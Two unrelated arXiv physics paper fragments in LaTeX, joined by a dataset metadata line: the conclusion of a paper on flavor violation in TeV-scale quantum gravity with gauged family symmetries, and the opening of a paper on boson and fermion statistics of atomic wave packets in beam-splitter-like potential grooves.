(\bar Q_L^aQ_{La})(\bar Q_L^{b}Q_{Lb})~+~
(\bar Q_L^aQ_{Lc})(\bar Q_L^b Q_{Ld})
\epsilon_{ab}\epsilon^{cd} \label{problematic}
\end{equation}
They both give a crudely similar effect.
So let us for definiteness concentrate on
the second one. Written in terms
of initial $s$ and $d$ states (call it 'flavor basis') it has a form:
\begin{equation}
(\bar s_Ls_L)(\bar d_Ld_L) - (\bar s_Ld_L)(\bar d_Ls_L)
\end{equation}
In general initial $s$ and $d$ states are not physical states
and are related to them by $2\times 2$ rotation $D_L$, which diagonalizes $1-2$ block of
the
down quark mass matrix $M^d$. The problem is that $D_L$ is {\it not} in general unitary
due
to non-zero $1-3$ and/or $2-3$ mixing in $M^d$. Note that this
elements can be of the order of one, without conflicting with small
$2-3$ and $1-3$ mixings in the Cabibbo-Kobayashi-Maskawa (CKM) matrix, since CKM
measures a mismatch between rotations of $u_L$ and $d_L$ and not
each of them separately.
If so, then in the physical basis the disastrous operator
\begin{equation}
(\bar s_Ld_L)(\bar s_Ld_L) \label{induced}
\end{equation}
will be induced with an unacceptable strength. This puts a severe constraint on the
structure of $M^d$. In particular all the anzatses with both large $1-2$ and $2-3$ (or
$1-3$) elements are ruled out. Note that smallness of $1-3$ and $2-3$ mixing in
$M^d$ also works in favor of suppression of $B^0 - \bar B^0$ transitions from the same
operator. Analogously, unitarity of $1-2$ diagonalization in $M^u$ suppresses the
$D^0 - \bar D^0$ transition. In this respect the safest scenario would be the one in which,
$1-2$ mixing in CKM comes mostly from down type masses, whereas $2-3$ mixing from ups.
Much in the same way the operator
\begin{equation}
(\bar d_R^ad_{R\alpha})(\bar d_R^bd_{R\beta})
\epsilon_{ab}\epsilon^{\alpha\beta} \label{RRRR}
\end{equation}
gives unitarity constraint on a $1-2$ block of $D_R$,
which can be somewhat milder since the operator (\ref{RRRR})
can in principle be suppressed by $U(3)_{d_R}$-symmetry,
by a factor $\sim m_b/m_t$.
For the operators which involve both left and right-handed quark states, the
suppression factors are more sensitive
to what subgroup of the $G_F$ is gauged.
\subsection{$L\times R$-Type Symmetries}
If the left and the right-handed quark are transforming
under different $U(2)_{FL}\otimes U(2)_{FR}$
flavor symmetries. The only possible unsuppressed operator is
\begin{equation}
(\bar Q_L^aQ_{La})(\bar Q_R^bQ_{R_b}) \label{barLR}
\end{equation}
(plus its Fierz-equivalent combinations).
Again, this is harmless only if $D_L$ and $D_R$ are nearly unitary,
which brings us back to the constraint discussed above.
\subsubsection{The Diagonal $U(2)_F$}
From the point of view of an anomaly cancellation,
the most economic possibility would be to gauge a diagonal
subgroup of $G_F$ under which all fermions are in the
fundamental representation.
Then at scales below $M_{Pf}$ we are left with an effective
$U(2)_F$ symmetry. In such a case one encounters an option
whether $U(2)_F$ is a chiral or vector-like symmetry.
It turns out that the chiral $U(2)_F$ is inefficient to
suppress a large flavor violation, whereas the vector-like
one can do the job, provided a stronger
restriction on the fermion mass pattern is met.\footnote{
Unfortunately, however, the vector-like
flavor symmetry $U(2)_F$ allows the fermion mass
degeneracy, and unnatural
conspiracies would be needed for explaining their observed
splitting. In this view, it would be most natural if the
vector-like $U(2)_F$ is supplemented by some (discrete of continuous) gauge chiral
piece of the full chiral $(L\times R)$ symmetry.}
To support the first statement it is enough to consider an operator:
\begin{equation}
(\bar Q_L^ad_L^{\alpha})(\bar Q_{Ra}d_{R\alpha}) \label{chiralLR}
\end{equation}
This is invariant under the chiral-$U(2)_F$ times an
arbitrary combination of extra $U(1)$-factors.
Obviously this operator is a disaster, since it directly contains
an unsuppressed four-Fermi interaction (\ref{kaon}).
Thus chiral $U(2)_F$ cannot protect us.
On the other hand the vector-like $U(2)$
suppresses (\ref{chiralLR}). Analogous
(self-conjugate) operators in this case would have the form:
\begin{equation}
(\bar Q_L^ad_{Ra})(\bar d_R^bQ_{Lb}), ~~~~
(\bar Q_L^ad_{R\alpha})(\bar d_R^bQ_{L\beta})
\epsilon_{ab}\epsilon^{\alpha\beta} \label{vectLR}
\end{equation}
which contains no (\ref{kaon}) term in the flavor basis.
The requirement that it will not be induced in the physical
basis simply translates as a requirement that
\begin{equation}
D_LD_R^+ = D_LD_L^+ = D_R D_R^+ = 1 \label{unitarity}
\end{equation}
with a great accuracy.
In other words, this means that the fermion mass matrices
should be nearly Hermitian.\footnote{This might be rather
natural in the context of the left-right symmetric model
$SU(2)_L\times SU(2)_R\times U(1)$}
If this is satisfied other operators do not cause
an additional constraints, since they are further suppressed.
For instance, non-self-conjugate operators:
\begin{equation}
(\bar Q_L^ad_{Ra})(\bar Q_L^bd_{Rb}), ~~~~
(\bar Q_L^ad_{R\alpha})(\bar Q_L^bd_{R\beta})
\epsilon_{ab}\epsilon^{\alpha\beta} \label{vectLR}
\end{equation}
carry two units of weak isospin and must be
suppressed by extra factor $\sim \left ( {M_W \over M_{Pf}} \right )^2$.
In conclusion, we see that all working versions converge to the
requirement (\ref{unitarity}).
\subsubsection{Why Abelian Symmetries Cannot work?}
Although our analysis was quite general,
one may wonder whether by considering non-Abelian symmetries,
one is not restricting possible set of solutions: for example
requirement of $SU(2)$ symmetry restricts the possible charge
assignment under the additional $U(1)$ factors which otherwise
could be used for the same purpose. In other words,
one may ask, whether instead of non-Abelian symmetries one
could have invoked a variety of $U(1)$ factors and by properly
adjusting charges of the different fermions get the same
(or even stronger) suppression of FCNP.
We will argue now that this is not the case,
and even (neglecting esthetics and various technical
complications, like anomalies) if one allows completely arbitrary
charge assignment under an arbitrary number of $U(1)$-factors,
the problem cannot be solved. The reason for this is that
no Abelian symmetry can forbid the operators of the form:
\begin{equation}
C_{ab}(\bar Q_L^aQ_{La})(\bar Q_L^bQ_{Lb})
\end{equation}
and similarly for right-handed fermions.
Since no non-Abelian symmetry is invoked the coefficients
$C_{ab}$ are completely arbitrary. Due to this fact there is
no choice of fermion mass matrixes which would avoid appearance
of either $(\bar sd)^2$ or $(\bar uc)^2$ unsuppressed vertexes.
Since $C_a$ are arbitrary, non-appearance of any of these operators
would mean that the flavor and the physical quark states are equal
(that is the masses are diagonal in a flavor basis). But this is
impossible to be the case in both up and down sectors
simultaneously due to non-zero Cabibbo mixing $\sin\theta_C=0.22$.
Thus at least one of these operators should be induced and the
suppression factor cannot be smaller than
\begin{equation}
\sin\theta_C^2/M_{Pf}^2
\end{equation}
This gives rise to an unacceptably large contribution
to either $\bar K^0 - K^0$ or $\bar D^0 - D^0$ transitions.
The only way to avoid the problem would be a conspiracy
between the $C_{ab}$ coefficients, which can be guaranteed
by non-Abelian $U(2)$ symmetry,
(subject to unitarity of $U_L, U_R, D_L$ and $D_R$ transformations).
\subsection{Electroweak Higgs-Mediated Flavour Violation.}
Existence of the $M_{Pf}$-suppressed operators
brings another potential source of flavour violation,
mediated by the electrically neutral component ($H^0$)
of the standard model Higgs.
In the standard model this sourse is absent since
the couplings of $H^0$ are automatically
diagonal in the physical basis.
This is not any more true if higher dimensional operators
with more Higgs verteces are involved\cite{Rattazzi}.
For instance, add the lowest possible such operator
\begin{equation}
\left (g_{ab} + h_{ab}{H^+H \over M_{PF}^2 +...} \right ) H\bar Q^a_Lq_{Rb}
\end{equation}
where $g_{ab}$ and $h_{ab}$ are constants.
After $H$ gets an expectation value the fermion masses become
\begin{equation}
M_{ab} = \left (g_{ab} + h_{ab}{|\langle H \rangle|^2
\over M_{PF}^2} + ...\right ) \langle
H \rangle
\end{equation}
whereas the Yukawa couplings of the physical Higgs are
\begin{equation}
Y_{ab} = g_{ab} + 3h_{ab}{|\langle H \rangle|^2 \over M_{PF}^2 +... }
\end{equation}
In the absence of flavour symmetries the matrixes $g_{ab}$ and $h_{ab}$ are arbitrary $3\times
3$ matrices and thus $M_{ab}$ and $Y_{ab}$ are not diagonal in the same basis. This induces
an unacceptably large flavour violation. In the present context however according to
Eq(\ref{chi}), $g_{ab}$ and $h_{ab}$ must be understood as
the VEVs of the horizontal Higgs scalars
\begin{equation}
g_{ab} \sim h_{ab} \sim \left ({\chi \over M}\right )^N_{ab} \label{hierarchy}
\end{equation}
and thus obey an {\it approximately same} hierarchy \cite{gd}. This can reduce the
resulting flavor violation to an acceptable level. For instance, adopting
anzats $Y_{ab} \sim {\sqrt{m_am_b} \over M_W}$\cite{chengsher}, where $m_a$ are masses of
physical
fermions, the resulting flavour violation can be below the experimental limits.
\subsection{decay $\mu \rightarrow e\gamma$, etc.}
The suppression of lepton-flavour violating processes through dimension-$6$ operators
goes much in the same spirit as discussed above for quarks. The constrains on
the $M^l$ mixing angles can be satisfied easier since not much is known about the
lepton mixing angles.
Dimension five operators can be more problematic.
For instance the lowest operator
inducing $\mu \rightarrow e\gamma$ transition is:
\begin{equation}
{H \over M_{PF}^2} \bar e \sigma^{\mu\nu}\mu F_{\mu\nu}
\end{equation}
This has the same chirality structure as the $m_{\mu e}$ mass term, and thus we expect to be
suppressed
by the same flavour symmetry that guarantees its smallness.
An exact strength of the suppression factor is very sensitive to the mixing in
the charged lepton matrix and can be as large as $m_{\tau} \over M_{Pf}^2$ for
the maximal $e-\mu -\tau$ mixing angles. But can be zero if mixing is absent.
The experimental limit
${\rm Br}(\mu \rightarrow e\gamma) < 5\times 10^{-11}$ translates
into
\begin{equation}
\lambda_{e\mu} < 3\times 10^{-6} \cdot
\left({M_{Pf}\over 1~{\rm TeV}} \right)^2
\end{equation}
which is satisfied for $\lambda_{e\mu}\sim
\sqrt{m_em_\mu}/\langle H\rangle = 4\cdot 10^{-5}$ and
$M_{Pf}\sim 3$ TeV. Analogously, for the $\tau \rightarrow \mu\gamma$
decay ${\rm Br}(\tau \rightarrow \mu\gamma) < 3\times 10^{-6}$
translates into
\begin{equation}
\lambda_{\mu\tau} < 3\times 10^{-2} \cdot
\left({M_{Pf}\over 1~{\rm TeV}} \right)^2
\end{equation}
which is well above the geometrical estimate
$\lambda_{\mu\tau}=
\sqrt{m_\mu m_\tau}/\langle H\rangle = 2.5\cdot 10^{-3}$.
Somewhat stronger constraints come from the electron and
neutron EDMs. For example, the experimental limit
$d_e < 0.3\cdot 10^{-26}~ e\cdot$cm implies
\begin{equation}
{\rm Im}\lambda_{e} < 10^{-9} \cdot
\left({M_{Pf}\over 1~{\rm TeV}} \right)^2
\end{equation}
therefore, for $\lambda_e$ taken of the order of the electron
Yukawa coupling constant, $\lambda_e \sim m_e/\langle H\rangle \sim
10^{-6}$ with a phase order 1, one needs to take
$M_{Pf} > 30$ TeV or so. Analogous constraint emerges
from the light quarks (i.e. neutron) EDM.
\subsection{Gauging Flavor Symmetry in the Bulk}.
Up to now we were discussing suppression of $M_{Pf}$-cutoff
operators by the gauge flavor symmetries.
What about flavor-violation mediated by the horizontal gauge
fields? Naively, one encounters a puzzle here: in order to suppress
quantum-gravity-induced operators, $G_F$ must survive
at scales below $M_{Pf}$, but in this case
the gauge bosons can themselves induce problematic operators.
Situation is very different if the horizontal gauge
bosons are the bulk fields.
Generic procedure of gauging an arbitrary gauge symmetry
in the bulk was discussed in details in \cite{add*} and
it was shown that: 1) an effective coupling of the
bulk gauge-field and its KK partners to the brane modes
is automatically suppressed by $g_4 \sim M_{Pf}/M_P$ and,
2) whenever the symmetry is broken on the brane
(only)
the mass of the gauge field is suppressed by $\sim M_{Pf}/M_P$
independently of the number of extra dimensions.
In the other words, as it should be, the symmetry broken on
the brane is "felt" by the brane fields much
stronger then by the bulk modes. This is not
surprising, since the bulk modes "spent" much more
time in the bulk where symmetry is
unbroken.
Consider a gauge field of some symmetry group
$G$ propagating in the bulk. We will assume the scale
of the original
$4 + N$ - dimensional gauge coupling to be
$g_{(4 + N)} \sim M_{Pf}^{-{N \over 2}}$.
From $4$-dimensional point of view, this
gauge field represents an infinite number of KK
states out of which only the zero mode $A_{\mu}^0$
shifts under the $4$-dimensional local
gauge transformation, whereas its KK partners are massive states.
All these states couple to the gauge-charged matter localized on
the brane through an effective
four-dimensional gauge coupling
\begin{equation}
g_4^2 \sim 1/(RM_{Pf})^N \sim M^2_{Pf}/M_P^2
\end{equation}
Consequently if any of the Higgs scalars localized
on the brane gets nonzero VEV
$\langle \chi (x_A)\rangle = \delta(x_A - x_A^0)\langle \chi \rangle$
(where $x_A^0$ are coordinates of the brane)
all the bulk states get a minuscule mass shift
\begin{equation}
\delta m^2 \sim \langle \chi \rangle^2 M^2_{Pf}/M_p^2 \label{wallshift}
\end{equation}
On the other hand if the Higgs scalar is a
bulk mode and its VEV is not localized on the
brane, but rather is constant in the bulk,
the gauge fields get an unsuppressed mass shift
\begin{equation}
\delta m^2 \sim \langle \chi \rangle^2/ M^N_{Pf} \label{bulkshift}
\end{equation}
Note that the bulk scalar $\chi$ has
dimensionality of $({\rm mass})^{1 + N/2}$.
What is the implication of these facts for the flavor symmetry?
Let $G_F = U(3)_F$ be a vector-like family symmetry under
which all the fermions are triplets and let us estimate
flavor violation induced by exchange of its gauge field.
Consider for instance $M^0 - \bar M^0$ transitions
(where $M = K, B, D$). Obviously, if $U(3)_F$ was unbroken,
all the four-fermion operators induced by their exchange
would never contribute to any of
these processes, since the only possible invariant is
\begin{equation}
\bar q^a q_a \bar q^b q_b \label{flavor-conserving}
\end{equation}
However, $U(3)_F$ must be broken in order to account for
the hierarchy of fermion
masses. Let $\chi$ be the Higgs that does this breaking.
We can consider three options:
{\bf 1. Breaking occurs only on the brane}.
Unfortunately this option is ruled out due to the following reason.
If $U(3)_F$ is broken on the brane, then there must be
massless pseudo-scalar modes localized on it.
These are Goldstone bosons (familons \cite{familon}) of broken
$U(3)_F$ which have both flavor-diagonal and
flavor-non-diagonal couplings to the
ordinary matter, suppressed by $\langle \chi \rangle$.
This is excluded due to various astrophysical and
laboratory reasons \cite{familon,familonruled}.
At a first glance, in the present context
this statement may appear as a surprise,
since by assumption $U(3)_F$ is a gauge symmetry and
thus troublesome familons must be eaten
up by the gauge fields. Recall however that the gauge coupling is
abnormally small (and the scale of symmetry breaking is not large).
In such a situation it is more useful to argue in terms of
the massless Goldstones, rather than massive gauge bosons.\footnote{
The situation is analogous to the case of the low energy
supersymmetry, when the dominant coupling of gravitino is provided
by its goldstino component!}
Thus we are left with the following option.
{\bf 2. Breaking occurs in the bulk}.
In this case familons are the bulk modes and are
totally safe by the same reason as the bulk gravitons \cite{add*}.
Thus the dominant contribution to the flavor-violation is provided
by the gauge components. Let us estimate this
contribution to the effective four-Fermi operators
mediating $M^0 - \bar M^0 $ processes. This comes from
the tree-level exchange of infinite tower of $KK$ states.
The mass of each individual KK mode is
\begin{equation}
m^2_K = \langle \chi \rangle^2/ M^N_{Pf} + {|n|^2 \over R^2}
\end{equation}
where $|n| = \sqrt{n_A^2}$ and $n_A$ are integers.
The second contribution is flavor-universal.
Thus for the heavy states the flavor violation will be suppressed by
$\sim \langle \chi \rangle^2 R^2/ M^N_{Pf}|n|^2$.
Note that the same scalars are responsible for the fermion masses through
\begin{equation}
\int dx^{4 + N} \delta(x_A){\chi_{b}^a \over
M_{Pf}^{1 + {N \over 2}}} H \bar Q_{La}q_R^b \label{chibulk}
\end{equation}
where dimensionality of the denominator comes from the fact
that $\chi$ is a bulk mode. Thus
$U(3)_F$-violating mass can be parameterized as
\begin{equation}
\langle \chi \rangle^2/ M^N_{Pf} = (\lambda M_{Pf})^2
\end{equation}
where $\lambda$ is roughly the Yukawa coupling of the fermion
(e.g. for $U(2)_H$ gauge bosons $\lambda$ can be taken to be
$\sim m_c/\langle H\rangle \sim 10^{-2}$ or so).
It is useful to evaluate contributions of the modes
${|n|^2 \over R^2} < (\lambda M_{Pf})^2$ and
${|n|^2 \over R^2} > (\lambda M_{Pf})^2$ separately.
Each of the first states generates an operator scaled by
${g_4^2 \over (\lambda M_{Pf})^2}$
whereas their multiplicity is roughly
$\sim (\lambda M_{Pf}R)^N$. Therefore their
combined effect gives an effective four-fermion regulator
\begin{equation}
\sim {\lambda^{N - 2} \over M_{Pf}^2}. \label{scaling}
\end{equation}
The flavor violating contribution of the modes with
${|n|^2 \over R^2} > (\lambda M_{Pf})^2$ is crudely
given by the sum
\begin{equation}
\sum_{n_A} {g_4^2R^4 \over |n|^4} (\lambda M_{Pf})^2
\sim g_4^2R^4 (\lambda M_{Pf})^2 |n|^{N - 4} |_{min}^{max}
\end{equation}
and it is power-divergent for $N > 4$.
Cutting off from above this sum at
$|n|_{{\rm max}} \sim (M_{Pf}R)$ we get that the
amplitude goes as
\begin{equation}
\sim {\lambda^2 \over M_{Pf}^2} \left ( 1 - \lambda^{N - 4} \right ) \label{scaling2}
\end{equation}
Thus we see that the dominant contribution comes from the lowest modes.
Combining everything we get that for $N > 3$ the operators scale as
\begin{equation}
\sim {\lambda^2 \over M_{Pf}^2}
\end{equation}
and are problematic even if
$\lambda \sim 10^{-2}-10^{-3}$.
The case $N < 4$ is even more problematic and,
in particular, there is no suppression for $N = 2$.
At a first glance this may appear as a surprise:
since in the limit $\lambda \rightarrow 0$ the transition
should be absent. Note however, that this does not
contradict to above result, since for
$\lambda M_{Pf}$ becoming smaller than the meson
mass $m_{M}$ an additional power suppression
$\sim {\lambda M_{Pf} \over m_{M}}$ must appear
in the flavor violating transition amplitude.
Thus, we are lead to the third option.
{\bf 3. Gauge fields and familons on the branes of different dimensionality.}
Imagine that flavor Higgs fields are not $3$-brane modes and live in space of larger
dimensionality. But,
unlike gauge fields,
they can only propagate in the bulk of less $N'< N$ dimensions. That is assume that
they live on $3 + N'$-brane which contains our $3$-brane Universe as a sub-space.
When the breaking occurs on the $3 + N'$-brane, both, masses of bulk
gauge fields and couplings of familons to the standard model fermions will
be suppressed by volume factors. The question is whether for certain
values of $N'< N$, both gauge and familons-mediated processes can be adequately
suppressed. Consider first some gauge-mediated FCNP. Since $\chi$-s are $3 +
N'$-dimensional
fields, according to (\ref{chibulk}) their VEV can be parameterized as
\begin{equation}
\langle \chi \rangle^2/ M^{N'}_{Pf} = (\lambda M_{Pf})^2
\end{equation}
The resulting flavor-non-universal mass for each gauge KK mode is
\begin{equation}
m_{fv}^2 = {(\lambda M_{Pf})^2 \over (M_{Pf}R)^{N - N'}}
\end{equation}
or if translated in terms of $M_P$, $m_{fv}^2 =
(\lambda M_{Pf})^2 (M_{Pf}/M_P)^{{2(N - N') \over N}}$. For the gauge-mediated
flavor-violation to be suppressed, this should be smaller than the typical
momentum transfer in the process $M^0 - \bar M^0$. If this is the case,
then the contribution to the process from the light ($<< m_M$) and heavy
($>> m_M$) modes go as $m_{fv}^2m_M^{N - 4}/M_{Pf}^N$ and
$m_{fv}^2/M_{Pf}^4$ respectively and are suppressed. Now let us turn to the familon
couplings. Since $\chi$ are $4 + N'$ dimensional fields, so are the familons and their
effective decay constant is\cite{add*}
\begin{equation}
1/(\lambda M_{Pf})(M_{Pf}R)^{N'/2}
\end{equation}
Again because of the bulk-multiplicity factor their emission rate is
amplified. For instance the star-cooling rate becomes\cite{add*}
\begin{equation}
\sim (\lambda M_{Pf})^{-2}(T/M_{Pf})^{N'}
\end{equation}
where $T$ is the temperature in the star. This is safe for $N' > 2$ even for $M_{Pf}
\sim$TeV. Contribution from light and heavy modes to familon-mediated flavor-violating
amplitudes are suppressed as
\begin{equation}
{1 \over (\lambda M_{Pf})^2}(m_M /M_{Pf})^{N'}
\end{equation}
and
\begin{equation}
{\lambda^{N'- 4}m_M^2 \over M_{Pf}^4}
\end{equation}
Finally let us consider flavor-violating operators induced by
horizontal Higgses. This can be analyzed much in the same way
as was done above for the gauge fields. If the non-zero VEV occupies the
whole $3 + N'$-brane volume where Higgs can freely propagate, then the
resulting dangerous operators are scaled as the largest of (\ref{scaling}) and
(\ref{scaling2})
where now $N$ must be understood as the number of the dimensions
where Higgs can propagate. This is very much like gauge-contribution
in the case of bulk-breaking. The difference is that horizontal Higgses have an extra
suppression factor $\sim (m_W/M_{Pf})^2$ and therefore are relatively safer.
\subsubsection{Custodial $SO(4)_F$}
We must stress that there may very well be the group-theoretical
cancellations which can weaken the above constraints.
For instance, imagine that $U(2)_F$ symmetry is broken by a
doublet VEV $\chi_a$. Gauge boson masses generated in this
way are automatically $SU(2)$ invariant due to
the {\it custodial}
global $SO(4)$ symmetry (just like in the standard model)
of the coupling
\begin{equation}
g^2 (\chi^{*a}\chi_a)A_{\nu}^\alpha A^{\nu\alpha}
\end{equation}
As a result in the leading order $U(2)_F$
non-invariant operator structure must cancel out.
\subsection{Conclusions}
Adopting philosophy that the quantum gravity explicitly breaks global symmetries
via all possible operators scaled by powers of $M_{Pf}^{-1}$, we studied some
implications of this
fact for the flavor-violation in theories with TeV scale quantum gravity\cite{add}.
In these theories the ordinary fermions are localized on a $3$-brane embedded in
space with $N$ new dimensions. We have discussed most dangerous
and model independent operators and their suppression by gauged family symmetries.
Non-Abelian symmetries (such as $U(2)_F$) broken below TeV seem to be necessity in this
picture, but in no way they are sufficient for FCNP-suppression. Additional constraints
come out for the structure of the fermion mass matrices and the high-dimensional bulk
properties of the
horizontal gauge fields. All the "safe" versions seem to converge to the structures in
which,
at best, only two generations can have significant mixing per each mass matrix. In
particular, this rules out all possible "democratic" structures: when mixing is maximal
among all three families.
To suppress gauge-mediated flavor violation and avoid standard bounds on the scale of
flavor symmetry breaking, the horizontal symmetry should be gauged in the bulk.
If breaking occurs in the bulk, the flavor violation is somewhat reduced
only for large enough number of new dimensions ($N > 2$). On the other hand if breaking
occurs in a subspace with $N'< N$ the gauge-mediated contribution can be strongly
suppressed, but unless $N'$ is also large, the would be familons, that are localized
on a $3 + N'$-brane, can mediate unacceptable flavor-violation.
Combining all the potential sources, it seems that unless implementing an extra source
of suppression "by construction" FCNP are pretty close to their experimental limits.
\acknowledgments
We thank Denis Comelli, Glennys Farrar and Gregory Gabadadze for very
useful discussions. We learned from Savas Dimopoulos about the complementary
paper\cite{savasnima}, we thank him for discussions. Before sending this paper we
became aware
of number of new papers\cite{new1}-\cite{new4} on phenomenology and cosmology of TeV
scale quantum gravity.
| 2024-02-18T23:40:15.885Z | 1998-11-18T00:02:22.000Z | algebraic_stack_train_0000 | 1,862 | 5,853 |
|
proofpile-arXiv_065-9226 | \section{Introduction}
The duality between wave and particle aspects is one of the central issues
of Quantum Mechanics. Much has been made of the particle aspects of photons,
but the recent progress in cooling and controlling atomic motion has brought
forward their wave mechanical behavior in a prominent way. The new field of
Atomic Optics has emerged \cite{ada}.
With modern cooling and trapping techniques, one can envisage controlled
motion of atomic particles in structures whose mechanical dimensions
match the heterostructures used in electronic circuits. Neutral atoms can be
stored in magneto-optical traps, and H\"{a}nsch and his group
has recently shown \cite{haen} that such traps can be made very small,
{\it viz} of the order of $10^2\mu{\rm m}.$
This requires high precision in the fabrication of the solid structures
defining the dimensions of the trap. Modern lithographic technology
suggests that such structures could be made even much smaller, and then we
can imagine experiments in traps of genuinely microscopic dimensions, where
quantum effects would dominate the particle dynamics. H\"{a}nsch has also
suggested that such traps could be made into channels and structures, thus
providing a tool to design arbitrary devices at the surface of a substrate.
Similar structures can be constructed by combining charged wires with
evanescent wave mirrors \cite{ess,sei} or magnetic mirrors \cite{roa}.
Such combinations can be used to build up the structures utilized in
nano-electronics. The use of wires to guide atomic motion has been
investigated by Denschlag and Schmiedmayer \cite{den}. Schmiedmayer
has also discussed the use of such structures to construct quantum
dots and quantum wires for atoms \cite{sch}.
Alternative ways to achieve guided motion and possibly controlled
interaction between atoms is to utilize hollow optical fibers with
evanescent waves trapping the atoms to narrow channels at the center of
the fiber \cite{ito,yin}. These can eventually be fused to provide
couplers similar to those used for optical signal transmission in
fibers. Also the pure atomic waveguide achievable by the use of hollow
laser modes may be used.
We see these methods as an opening to novel and innovative uses
of particle traps. By arranging a network of grooves on a surface,
we can launch particles (wave packets) into the various inputs of
the system, let them propagate through the device and interact with
its structures and each other. This may well provide an opportunity
to design quantum apparatuses, process information and perform
computations. The advantage is that both the structures and the input
states are easy to control in an atomic environment. An equivalent
point of view is expressed by Schmiedmayer in Ref. \cite{sch}.
A next step in the experimental progress would be to observe the quantum
character of atoms (or possibly ions).
An essential quantum characteristic of particles is their statistical
behavior. The difference between bosons and fermions manifests
itself dramatically in many situations. Optical networks can be
fed by a few photons only, and their quantum aspects have been
utilized in experiments
ranging from secure communication to tests of fundamental issues. Recently
Zeilinger and his group \cite{zeil} have tested the behavior of two-photon
states at beam splitters. Using the overall symmetry properties of the
states, they have been able to display both symmetric and antisymmetric
behavior.
Similar experiments are in principle possible with electrons. In
nanostructures, one can fabricate the devices simulating optical components,
but it is far less trivial to launch single conduction electrons in well
controlled states. Yamamoto's group, however, has been able to show quantum
correlations in an experiment which is the analogue of a beam splitter for
photons \cite{yama}.
In this paper we give an example of the multiparticle effects
observable when particle states are launched along potential grooves
on a surface. The specific phenomenon singled out for investigation is
the effect of particle statistics at a beam-splitter-like coupling
device. The corresponding effect with photons is described in Sec. II
as a motivation.
In Sec. III we present the details of the model chosen and a
simplified analytic treatment demonstrating the main features expected
of this model. In Sec. IV we carry through a numerical analysis of the
situation, for one particle as a two-dimensional propagation problem,
but for two particles in a paraxial approximation. For non-interacting
particles, the expected behavior is found, but when particle
interactions are added, the boson behavior is changed. For fermions
the exclusion principle make them essentially insensitive to the
interaction. An unexpected feature is found: the sign of the
interaction is irrelevant for the effect. In Sec. V this is explained
within our simple analytic model, and, as a consequence, a certain
universality is proposed: When the interaction strength over the
tunneling frequency becomes of the order of $\sqrt{3}$, the
noninteracting bosonic behavior is essentialy destroyed. This is
verified by numerical calculations, reported in Fig. 13. Finally
Sec. VI presents a discussion of parameter ranges in real materials,
where our effects may be observable, and summarizes our conclusions.
\section{Motivation}
In order to show the opportunities offered by atomic networks, we
investigate the
manifestations of quantum statistics on an experiment emulating the
behavior of photons in beam splitters. This is a straightforward approach,
which enables us to display the potentialities and limitations of such
treatments.
Our work has been motivated by the statistics displayed by a 50-50
beam splitter, which has been used in the experiments by the Zeilinger
group \cite{zeil}.
When two particles are directed into the beam splitter in the incoming
modes in Fig. \ref{bs},
they are piloted into the outgoing modes according to the beam splitter
relations
\begin{equation}
\left[\begin{array}{c}
a_{\rm{out}}^{\dagger } \\
b_{\rm{out}}^{\dagger }
\end{array}\right]
=\frac 1{\sqrt{2}}
\left[\begin{array}{c c}
1 & -i \\
-i & 1
\end{array}\right]
\left[\begin{array}{c}
a_{\rm{in}}^{\dagger } \\
b_{\rm{in}}^{\dagger }
\end{array}\right]; \label{a1}
\end{equation}
see Ref. \cite{leo}.
When one particle is directed into each incoming channel, the state is
\begin{equation}
| \Psi \rangle =a_{\rm{in}}^{\dagger }b_{\rm{in}}^{\dagger }| 0\rangle ,
\label{a2}
\end{equation}
where $|$$0\rangle$ is the vacuum state. Without assuming anything about
the statistics of the incoming particles, we can express the state
(\ref{a2}) in terms of the outgoing states by inverting the relation
(\ref{a1}) as
\begin{equation}
| \Psi \rangle =\frac i2\left[ \left( a_{\rm{out}}^{\dagger }\right)
^2+\left(
b_{\rm{out}}^{\dagger }\right) ^2\right] | 0\rangle +\frac 12\left[
a_{\rm{out}}^{\dagger },b_{\rm{out}}^{\dagger }\right] | 0\rangle . \label{a3}
\end{equation}
From this follows that boson statistics gives
\begin{equation}
| \Psi \rangle =\frac i{\sqrt{2}}\left( | n_{a,\rm{out}}=2,n_{b,\rm{out}}=
0\rangle +| n_{a,\rm{out}}=0,n_{b,\rm{out}}=2\rangle \right) ; \label{a4}
\end{equation}
the particles emerge together at either output. For fermions we have
\begin{eqnarray}
| \Psi \rangle &=&a_{\rm{out}}^{\dagger }b_{\rm{out}}^{\dagger }
| 0\rangle \label{a5}\\
&=& | n_{a,\rm{out}}=1,n_{b,\rm{out}}=1\rangle, \nonumber
\end{eqnarray}
and they always remain separated.
Weihs et al. \cite{zeil} have been able to verify these properties
experimentally using photons. As the requirements of quantum statistics
refer only to the total wave functions, they have been able to realize both
the symmetric and the antisymmetric case, thus offering the behavior of
both bosons and fermions.
Photons are ideal for experiments, they do not interact mutually and they
propagate essentially undisturbed in vacuum. As models for quantum systems,
they have the drawback that they cannot be localized, their wave packets are
of rather elusive character, and the influence of particle interactions
cannot be established. Thus we have chosen to discuss the propagation of
massive particles through beam-splitter-like structures. As explained above,
such experiments may be performed with atoms or electrons in traps of
microscopic dimensions. We can thus investigate the propagation of wave
packets through these structures, explore the role of quantum statistics
and switch on and off the particle interaction at will.
\section{The model}
\label{smod}
We consider particles moving in potential
wells which form grooves over a two-dimensional surface. These may cross or
couple by tunneling when approaching each other, thus forming a network of
potential channels emulating a linear optical system.
Here we consider two separate channels which run parallel for $z\rightarrow
\pm \infty $ and approach each other in the $x-$direction, as shown in
Fig. \ref{pot}. For simplicity we construct the potential from two harmonic
oscillators
\begin{equation}
U_{\pm }(x)=\frac 12m\omega ^2(x\pm{1\over 2}d)^2, \label{a6}
\end{equation}
so that a double well potential can be obtained by
writing
\begin{eqnarray}
U(x,z) & = & {U_{+}(x,z)U_{-}(x,z)}\over{U_{+}(x,z)+U_{-}(x,z)}\label{a7}\\
& = & \frac 12m\omega ^2 {{\left( x+{1\over 2}d(z)\right) ^2
\left( x-{1\over 2}d(z)\right) ^2}
\over{\left( x+{1\over 2}d(z)\right) ^2+\left( x-{1\over 2}d(z)\right)
^2}} \nonumber.
\end{eqnarray}
If we now choose $d(z)$ in a suitable manner, we can achieve the potential
behavior shown in Fig. \ref{pot}. Note that at the minima, the potential
$U(x,z)$ essentially follows the shape of the smaller potential $U_{\pm }$.
We consider a wave packet sitting stationary near the bottom of one
well at
$z=0,$ where the distance between the wells is at its minimum $d_0$.
The particle can then tunnel across the barrier with the rate
\begin{equation}
T\sim \exp \left[ -\int \sqrt{2mU(x,0)}dx\right] \approx
\exp \left[ -\kappa \sqrt{U(0,0)}d_0\right] , \label{a8}
\end{equation}
where $\kappa $ is some constant. From Eq. (\ref{a7}) we see that
